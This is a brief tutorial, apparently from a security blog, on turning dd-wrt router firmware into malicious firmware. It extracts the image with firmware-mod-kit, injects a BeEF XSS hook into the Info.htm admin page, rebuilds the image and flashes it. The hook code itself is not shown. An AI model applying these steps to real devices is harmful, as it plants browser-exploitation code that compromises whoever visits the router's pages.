Firmware-Mod-Kit to make Malicious Firmware
First, we need to extract the firmware we have. I am using a router that is running dd-wrt, so I figure that would be a good firmware to get and rip apart. First, we run the command ./extract-firmware.sh filename. This will decompress the firmware and put it nicely into a “fmk/” directory.
Next we extract the dd-wrt gui (web sites) by typing ./ddwrt-gui-extract.sh:
We then find our target page Info.htm, open it and add in our XSS beef hook:
We package it all up and with ./ddwrt-gui-rebuild & ./build-firmware. When its done, we flash our router with the new firmware. When we come back to the page… our browser is now hooked and expoited.